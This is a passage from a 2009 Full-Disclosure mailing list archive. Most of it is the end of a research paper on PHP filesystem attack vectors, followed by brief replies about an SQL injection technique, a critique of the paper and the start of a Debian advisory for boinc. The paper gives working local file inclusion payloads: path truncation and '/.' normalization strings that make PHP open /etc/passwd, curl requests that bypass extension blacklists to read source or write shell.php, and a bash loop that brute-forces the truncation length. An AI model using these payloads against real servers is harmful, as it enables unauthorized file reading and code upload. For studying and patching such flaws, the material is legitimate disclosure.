snprintf(trypath, MAXPATHLEN, "%s/%s", ptr, filename); --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As you can see PHP, instead of raising an error silently, truncates the string to MAXPATHLEN chars. The length at wich the path was truncated has been correctly investigated in [3] and the related code is the following: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- /main/php.h: #ifndef MAXPATHLEN # ifdef PATH_MAX # define MAXPATHLEN PATH_MAX # elif defined(MAX_PATH) # define MAXPATHLEN MAX_PATH # else # define MAXPATHLEN 256 # endif #endif /win32/param.h #ifndef MAXPATHLEN # define MAXPATHLEN _MAX_PATH #endif --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- And is 4k on most systems. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- strace -e open php -r 'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo_", 1200)))."/append.php");' open("/usr/tmp/somethingfoo_foo_foo_foo_foo_foo_[OMIT]foo_foo_f", O_RDONLY) = -1 ENAMETOOLONG (File name too long) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Will result in ENAMETOOLONG but this limitation of glibc can be overcame using directories. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- strace -e open -s 100000 php -r 'include("includes/".addslashes(urldecode("../../../tmp/something".str_repeat("foo/", 1200)))."/append.php");' open("/usr/tmp/somethingfoo/foo/foo/foo/foo/foo/[OMIT]foo/foo/f", O_RDONLY) = -1 ENOENT (No such file or directory) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This alone can't be helpful to mount an attack because somebody should be able to create a deeply nested directory structure and the offending file with an arbitrary filename at the end. An attacker with such ability could simply create a file that fits the initial needs of the appended string. This is an example where the path normalization vector comes in help and can be combined with the path truncation issue to achieve a greater goal (nullbyte emulation on magic_quotes_gpc enabled systems). The sled after the payload, containing the directory traversal path and the offending filename, must be one of the already seen path normalization attack verctors (eg: "/" or "/." repeated many times). Doing something is like filling the buffer until MAXPATHLEN of something that will disappear before the actual open() syscall. Slashes normalization happens on PHP vanilla; here they count as chars in the truncation code but are still normalized to a single / causing the ENOTDIR error. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/app", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."/append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."//append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."///append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("//", 2027)."////append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/", O_RDONLY) = -1 ENOTDIR (Not a directory) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Instead /. normalization is transparent and no char is appended to the resulting path. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/.ap", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/.app", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."/append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest/a", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/tmp/teest/ap", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace -e open php -r 'include("a/../../../../tmp/teest".str_repeat("/.", 2027)."/.append.inc");' 2>&1 | grep "^open(\"/tmp" open("/tmp/teest", O_RDONLY) = 3 (it works, bingo!) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Remember that: - On vanilla PHP versions the last char of the path must be a dot for the reasons explained above. - On patched PHP versions adjacent slashes are normalized in a different way and they work as the universal "/." path normalization vector. VI) PHP filesystem functions path truncation attack details Some of you may have noted that there are two open() calls ("/tmp/teest/a" and "/tmp/teest/ap") that show different arithmetic calculations (one has only one char of the appended string, the other two chars). Others may also ask why a relative path, that starts with a directory that doesn't exist, really works. This is because of the many (evil) normalization instructions and routines implemented in PHP in conjunction with a feature: include_path. include_path is a feature of PHP similar to the PATH on unix systems, when an include, include_once, require or require_once call is made if the file is relative (eg: doesn't begin with a slash or a drive letter on Windows) a lookup will happen in every path defined in include_path. include_path is defined both at ./configure time and in the php.ini or at runtime with ini_set("include_path" ..) and defaults to ".:". Most distributions and vendors dispach PHP with different settings. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- (on Gentoo) include_path = ".:/usr/share/php5:/usr/share/php" --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The important thing when using the universal normalization vector is that at last one path is even and at last one is odd. The following is a complete strace of what happens: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ strace php -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");' 1>/dev/null getcwd("/home/antani"..., 4096) = 13 time(NULL) = 1232724170 lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0 lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0 lstat64("/usr/share/php5", {st_mode=S_IFDIR|0755, st_size=88, ...}) = 0 lstat64("/usr/share/php5/a", 0x5edafcdc) = -1 ENOENT (No such file or directory) open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) time(NULL) = 1232724170 lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0 lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0 lstat64("/usr/share/php", {st_mode=S_IFDIR|0755, st_size=72, ...}) = 0 lstat64("/usr/share/php/a", 0x5edafcdc) = -1 ENOENT (No such file or directory) open("/etc/passwd", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 read(3, "root:x:0:0:root:/root:/bin/bash\nb"..., 8192) = 3379 read(3, ""..., 8192) = 0 read(3, ""..., 8192) = 0 close(3) = 0 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As we are going to demonstrate, this attack is only possible thanks to the include_path feature and a specially crafted payload able to trigger it. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ strace php -r 'include("etc/passwd/.");' 1>/dev/null (relative lookup to cwd, eg: open of /home/antani/etc/passwd, then include_path lookups) $ strace php -r 'include("etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null (no relative lookup (!!), then include_path lookups) $ strace php -r 'include("../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null (complete failure) $ strace php -r 'include("a/../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null (unexisting relative directory "a" in include_path paths, but ends opening /usr/etc/passwd cause it doesn't traverse enought) getcwd("/home/antani"..., 4096) = 13 time(NULL) = 1232728270 lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0 lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0 lstat64("/usr/share/php5", {st_mode=S_IFDIR|0755, st_size=88, ...}) = 0 lstat64("/usr/share/php5/a", 0x5a9460cc) = -1 ENOENT (No such file or directory) open("/usr/share/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) time(NULL) = 1232728270 lstat64("/usr", {st_mode=S_IFDIR|0755, st_size=560, ...}) = 0 lstat64("/usr/share", {st_mode=S_IFDIR|0755, st_size=9984, ...}) = 0 lstat64("/usr/share/php", {st_mode=S_IFDIR|0755, st_size=72, ...}) = 0 lstat64("/usr/share/php/a", 0x5a9460cc) = -1 ENOENT (No such file or directory) open("/usr/share/etc/passwd", O_RDONLY) = -1 ENOENT (No such file or directory) $ strace php -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' 1>/dev/null (unexisting relative directory "a" in include_path paths, correctly open /etc/passwd) [..] open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) [..] open("/etc/passwd", O_RDONLY) = 3 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- So the payload has to start with a non-existing directory, continue with the traversal sled, point to the path to include and end with the normalization/truncation sled. Please refer to the VIII section (POC and attack code) for more compact POC code. Here is a final demostration on how this truncation issue works, thanks to include_path and to the length of the path defined: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ cat phpini_1 [PHP] include_path = ".:/tmp/1234:/tmp/123" $ cat phpini_2 [PHP] include_path = ".:/tmp/123:/tmp/1234" $ strace php -n -c phpini_1 -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");' getcwd("/home/antani"..., 4096) = 13 time(NULL) = 1232730352 lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 lstat64("/tmp/1234", 0x5b3ad18c) = -1 ENOENT (No such file or directory) open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory) time(NULL) = 1232730352 lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 lstat64("/tmp/123", 0x5b3ad18c) = -1 ENOENT (No such file or directory) open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory) $ strace php -n -c phpini_2 -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2027)."/.append.inc");' getcwd("/home/antani"..., 4096) = 13 time(NULL) = 1232730409 lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 lstat64("/tmp/123", 0x5f5a491c) = -1 ENOENT (No such file or directory) open("//etc/passwd/.append", O_RDONLY) = -1 ENOTDIR (Not a directory) time(NULL) = 1232730409 lstat64("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 lstat64("/tmp/1234", 0x5f5a491c) = -1 ENOENT (No such file or directory) open("//etc/passwd/.appen", O_RDONLY) = -1 ENOTDIR (Not a directory) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- >From our analysis it turned out that the path truncation attack can work only if include_path contains at last one absolute path; this means that while vendor releases are mostly vulnerable, systems with the default commented include_path configuration are not affected at all. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ strace php -n -d include_path=".:" -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' (doesn't work) $ strace php -n -d include_path=".:/tmp" -r 'include("a/../../../../etc/passwd".str_repeat("/.", 2067)."/.append.inc");' (works) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Ending path truncation on latest PHP is possible and all the LFI exploits that make use of the nullbyte technique can now be rewritten in order to use the techniques exposed in this paper. VII) The facts The following section includes some tecnical examples for boh vanilla and patched PHP. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- strace -e getcwd,lstat64,open php -r 'file_get_contents("runme");'; getcwd("/home/antani"..., 4096) = 13 lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0 lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0 lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0 open("/home/antani/runme", O_RDONLY) = 3 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/");'; getcwd("/home/antani"..., 4096) = 13 lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0 lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0 lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0 open("/home/antani/runme/", O_RDONLY) = -1 ENOTDIR (Not a directory) Warning: file_get_contents(runme/): failed to open stream: Not a directory in Command line code on line 1 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- strace -e getcwd,lstat64,open php -r 'file_get_contents("runme/.");'; getcwd("/home/antani"..., 4096) = 13 lstat64("/home", {st_mode=S_IFDIR|0755, st_size=336, ...}) = 0 lstat64("/home/antani", {st_mode=S_IFDIR|0770, st_size=3216, ...}) = 0 lstat64("/home/antani/runme", {st_mode=S_IFREG|0660, st_size=4109, ...}) = 0 open("/home/antani/runme", O_RDONLY) = 3 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As visible with PHP, opening "runme/." or "runme/./." is the same as opening "runme". This leads to interesting considerations and security issues. I informally spoke about this to Kuza55 and Wisec in April 2007 [4] but the analisys was incorrect. We also made some checks to see if this was filesystem dependent and we found it was not (it's filesystem independent). --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- #!/bin/sh mkdir "/fs_""$1""_mount" dd if=/dev/zero of="fs_""$1" bs=1M count=10 mkfs -t "$1" "fs_""$1" mount "fs_""$1" "/fs_""$1""_mount" -t "$1" -o loop --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Test and analisys for "PHP 5.2.8-pl1-gentoo" --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -v PHP 5.2.8-pl1-gentoo (cli) (built: Jan 21 2009 15:57:44) Copyright (c) 1997-2008 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies DOESN'T WORK $ strace php -r 'include("/etc/passwd/");' lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0 lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) write(1, "\nWarning: include(/etc/passwd/): "..., 103) = 103 Warning: include(/etc/passwd/): failed to open stream: Not a directory in Command line code on line 1 WORKS $ strace php -r 'include("/etc/passwd/.");' lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0 lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 open("/etc/passwd", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 WORKS $ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/etc/passwd", O_RDONLY) = 3 WORKS $ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/etc/passwd", O_RDONLY) = 3 DOESN'T WORK $ test="a/../../../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) DOESN'T WORK $ test="a/../../../../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Summary for "5.2.8-pl1-gentoo without any patch: - Appending / to a file does not work. (While will work for patched PHP versions as shown below) - Appending /. to a file works! Bypasses blacklist filters. - Appending many / to a file doesn't work! (While will work for patched PHP versions as shown below) - Appending many /. to a file works! Bypasses blacklist filters and CAN be used for path truncation! Test and analisys for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3": --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -v PHP 5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3 (cli) (built: Jan 21 2009 15:19:02) Copyright (c) 1997-2008 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH WORKS $ strace php -r 'include("/etc/passwd/");' lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0 lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 open("/etc/passwd", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 WORKS $ strace php -r 'include("/etc/passwd/.");' lstat64("/etc", {st_mode=S_IFDIR|0755, st_size=7424, ...}) = 0 lstat64("/etc/passwd", {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 open("/etc/passwd", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=3379, ...}) = 0 DOESN'T WORK (2048*2 is too much and Suhosin block it) $ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2048})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" ALERT - Include filename ([OMIT]) is too long (attacker [OMIT] WORKS! (Tweaked number of /.! Also note the absence of [lf]stat64 calls) $ test="a/../../../../etc/passwd"$(printf '/.%.0s' {1..2028})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/etc/passwd/", O_RDONLY) = -1 ENOTDIR (Not a directory) open("/etc/passwd", O_RDONLY) = 3 DOESN'T WORK $ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4062})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/.../etc/passwd/", O_RDONLY) = -1 ENOENT (No such file or directory) DOESN'T WORK $ test="a/../../../.../etc/passwd"$(printf '/%.0s' {1..4063})"ppend.inc"; $ strace -e open php -r "echo \"$test\".\"\n\"; @include(\"$test\");" ALERT - Include filename ([OMIT]) is too long (attacker [OMIT] --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Summary for "5.2.8-pl1-gentoo with Suhosin-Patch 0.9.6.3": - Appending / to a file works! Bypasses blacklist filters. - Appending /. to a file works! Bypasses blacklist filters. - Appending many / to a file works! Bypasses blacklist filters but CAN'T be used for path truncation. - Appending many /. to a file works! Bypasses blacklist filters and CAN be used for path truncation! So our universal file truncation attack for PHP works also on Suhosin. VIII) POC and attack code - Blacklist extension check for reading This POC will expose the bypass of a file viewer that blacklists certain file extensions. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This would be normally not exploitable, but with the exposed techniques it is. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ curl "http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php" You are not allowed to see source files! $ curl "http://localhost/poc_blacklist_bypass_read.php?file=poc_blacklist_bypass_read.php/." [OMISSION, the application source, a quine!] --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As you can see appending the neutral "/." token successfully tricks the check. - Blacklist extension check for writing (online file editors, etc.) This POC will expose the bypass of an online file editor that blacklists certain file extensions. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Exploitation is similar to the previous POC. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ curl "http://localhost/poc_blacklist_bypass_edit.php" \ -d "file=shell.php&text=antani" You are not allowed to edit or create source files! $ curl "http://localhost/poc_blacklist_bypass_edit.php" \ -d "file=shell.php/.&text=antani" 6 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- By the way: six is the number of bytes written to "shell.php". - Path truncation POC We provide both a standard vulnerable page and an "attack" utility, tweak the "TWEAK ME" line to use the payload of your choice. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ cat poc_path_truncation.php $ cat poc_path_truncation.sh #!/bin/bash url="http://localhost/poc_file_truncation.php?class=unexisting/../../../../../etc/passwd/." n_iterations=3000 for ((repetitions=1; repetitions<=n_iterations; repetitions+=1)); do if [ "`curl -kis $url | grep "^root:x"`" != "" ]; then echo -en "[$repetitions]"; else echo -en "."; fi url+="/."; # TWEAK ME done --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- At a certain lenght (2019 on our test system) it should start printing numbers inside square brackets, that means that /etc/passwd has been succesfully included. - Windows path truncation POC On Windows the universal path truncation token is "./" and not "/.". --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This means that "file.est./././[OMIT]./.php" will work, while the already seen "file.est/././[OMIT]././.php" will not. Please keep this in mind when working with Windows machines. The tokenizer is defined as follows: TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\" Another payload that works for the truncation attack is ".\" but we weren't able to find something equivalent to the "/etc/passwd/." on Unix. Feel curious and want to spend more time on the issue? (-; --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- IX) Conclusions Path normalization can be used for a number of goals including blacklist check bypass on isset, write and read filesystem operations plus signature evasion. Path truncation can be used in place of nullbyte poisoning if an include_path setting with absolute directories is present in order to archieve LFI (and RFI [5]) attacks. X) References [1] http://sla.ckers.org/forum/read.php?16,25706,25736#msg-25736 [2] http://pragmatk.blogspot.com/2009/01/lfi-fun.html [3] http://pragmatk.blogspot.com/2009/01/lfi-fun-2.html [4] http://www.ush.it/team/ush/hack-phpfs/log_ascii_kuza_07-04-08.txt [5] http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/ [6] http://verens.com/archives/2008/10/13/security-hole-for-files-with-a-dot-at-the-end/ I was reading the Apache source to try spot the problem, and found the area where it happens - it's in the file "http/mod_mime.c". The function "find_ct()" extracts the extension for the server to use. Unfortunately, it ignores all extensions it does not understand, so it's not just a case of "test.php." being parsed as ".php", but also "test.php.fdabsfgdsahfj" and other similar rubbish files! [7] http://download.suhosin.org/suhosin-patch-5.2.8-0.9.6.3.patch.gz --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Credits (Out of band) This article has been bought to you by ush.it team. Francesco "ascii" Ongaro and Giovanni "evilaliv3" Pellerano are the ones who spent most hours on it with the precious help of Antonio "s4tan" Parata, Stefano "Wisec" Di Paola, Alex "kuza55", Alessandro "Jekil" Tanasi and many other friends. A special greeting is for Florin "Slippery" Iamandi, a men behind, in a way or another, many of the productions of ush.it. Thanks everybody, you all make me feel at home! Francesco "ascii" Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it Giovanni "evilaliv3" Pellerano web site: http://www.evilaliv3.org/ mail: giovanni.pellerano AT evilaliv3 DOT org --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Legal Notices Copyright (c) 2009 Francesco "ascii" Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the article is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From dani at kachakil.com Sun Feb 8 13:28:27 2009 From: dani at kachakil.com (Daniel Kachakil) Date: Sun, 8 Feb 2009 14:28:27 +0100 Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!) References: <08BED96B74184FB588ABC2C7DBA89B23@DK> Message-ID: <93B03C60951E44D0A394B0A04F871B50@DK> Dear Paul: Thanks for your comments. And yes, I think you are 100% right. The SFX-SQLi "injection technique/method" (is there a better name for it?) will not help you to extract more data than other existing techniques. The XMLSCHEMA option is only an alternative way to get the column names (instead of using SYSOBJECTS, for instance). Maybe it can also bypass some basic filters (e.g. there is no need to use the WHERE clause), but this is secondary... The main difference is this: - Time-based SQL injection: 1 request -> 1/2 char using Deep Blind (but very slowly) - Blind SQL injection: 1 request -> 1/7 char - Union / error-based SQL injection: 1 request -> 1 field - SFX-SQL injection: 1 request -> 1 table So yes, this technique will extract the same data, but thousands of times faster than other methods. Regards, Daniel Kachakil -------------------------------------------------- From: "Paul Schmehl" Sent: Sunday, February 08, 2009 5:10 AM To: Cc: "Daniel Kachakil" Subject: Re: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!) > --On February 7, 2009 10:02:21 AM -0600 Daniel Kachakil > wrote: >> >> I have written a paper describing how the technique works and in which >> fundamentals it is based, and I have also developed a tool which >> implements >> this technique as a proof of concept (with the source code included). >> >> You can get them through this URL: >> >> http://www.kachakil.com/papers/SFX-SQLi-en.htm > > Having read your paper, I'm a bit confused about what you think the "new > SQL injection technique" is that you've discovered. I understand you have > determined a way to *extract* data in a more compact and efficient format, > but I didn't see any new *injection* technique. IOW, the FOR XML > construct isn't going to assist you in obtaining the data - only in > obtaining it more efficiently. > > Did I miss something? > > Paul Schmehl, If it isn't already > obvious, my opinions are my own > and not those of my employer. > ****************************************** > WARNING: Check the headers before replying > From stefan.esser at sektioneins.de Sun Feb 8 13:12:43 2009 From: stefan.esser at sektioneins.de (Stefan Esser) Date: Sun, 08 Feb 2009 14:12:43 +0100 Subject: [Full-disclosure] PHP filesystem attack vectors In-Reply-To: <498EB9A2.9030206@katamail.com> References: <498EB9A2.9030206@katamail.com> Message-ID: <498EDA4B.2060507@sektioneins.de> Hello, ascii schrieb: > PHP filesystem attack vectors > > Name PHP filesystem attack vectors > Systems Affected PHP and PHP+Suhosin This research misses some information. It compares "vanilla PHP" to "patched PHP" but that is not exactly true. PHP + Suhosin replaces the system's realpath() with an own implementation based on FreeBSD (+ some hardening). This means everything presented that works against PHP + Suhosin should work against vanilla PHP when used on FreeBSD, OS X, OpenBSD, ... Additionally the research should be repeated with PHP 5.3-beta, because it now does something very similar to Suhosin. Stefan Esser From jmm at debian.org Sun Feb 8 21:31:08 2009 From: jmm at debian.org (Moritz Muehlenhoff) Date: Sun, 8 Feb 2009 22:31:08 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1718-1] New boinc packages fix validation bypass Message-ID: <20090208213108.GA4978@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1718-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff February 08, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : boinc Vulnerability : incorrect API usage Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-0126 Debian Bug : 511521 It was discovered that the core client for the BOINC distributed computing infrastructure performs incorrect validation of the return values of OpenSSL's RSA functions. For the stable distribution (etch), this problem has been fixed in version 5.4.11-4+etch1. For the upcoming stable distribution (lenny), this problem has been fixed in version 6.2.14-3. For the unstable distribution (sid), this problem has been fixed in version 6.2.14-3. We 